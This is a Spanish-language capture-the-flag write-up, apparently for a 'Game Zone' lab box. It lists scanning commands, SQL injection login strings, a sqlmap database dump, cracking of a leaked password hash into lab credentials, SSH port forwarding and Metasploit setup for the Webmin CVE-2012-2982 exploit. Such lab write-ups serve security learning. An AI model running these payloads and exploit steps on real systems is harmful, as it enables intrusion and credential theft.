nmap -A -p- -oA output 10.10.127.231 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210505070200.png

Pasted image 20210505070225.png

nmap -sC -sV -O -p- -oA gamezone 10.10.127.231

nmap -sU -O -p- -oA gamezone-udp 10.10.127.231

nikto -h 10.10.127.231:80

gobuster dir -k -u http://10.10.127.231/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

Pasted image 20210505070929.png

' or 1=1 -- -' ' or 1=1 #'

Usando burpsuite para ver que se manda a la base de datos

Pasted image 20210505071624.png

Pasted image 20210505072200.png

sqlmap -r gamezonerequest.txt --dbms=mysql --dump

  • -r usa el request que habias guardado anteriormente
  • --dbms le indica a SQLMap el tipo de dbs que es
  • --dump este comando despliega toda la bd

Pasted image 20210505072015.png

Pasted image 20210505072424.png

Pasted image 20210505072451.png

Ponemos este hash: ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14 en un archivo llamado gamezonehash.txt

john gamezonehash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-SHA256

agent47/videogamer124

Pasted image 20210505073237.png

Vemos cuantas conexiones en tcp estan corriendo ss -tulpn | grep tcp

Pasted image 20210505073921.png

Trate de conseguir acceso corriendo lo siguiente

ssh -L 10000:127.0.0.1:10000 agent47@10.10.127.231

Hice un curl para ver si tenia acceso

curl 127.0.0.1:10000

Pasted image 20210505075307.png

nmap -sV -p 10000 127.0.0.1

Pasted image 20210505075456.png

$ msfconsole -q msf6 > search CVE-2012-2982 msf6 > use 0 msf6 exploit(unix/webapp/webmin_show_cgi_exec) > show options

Pasted image 20210505075950.png

msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set rhosts 127.0.0.1 msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set ssl false msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set rpot 10000 msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set username agent47 msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set password videogamer124 msf6 exploit(unix/webapp/webmin_show_cgi_exec) > set lhost tun0

Pasted image 20210505080819.png

Pasted image 20210505080755.png

boxes

copyright©2022 Cu3rv0x all rights reserved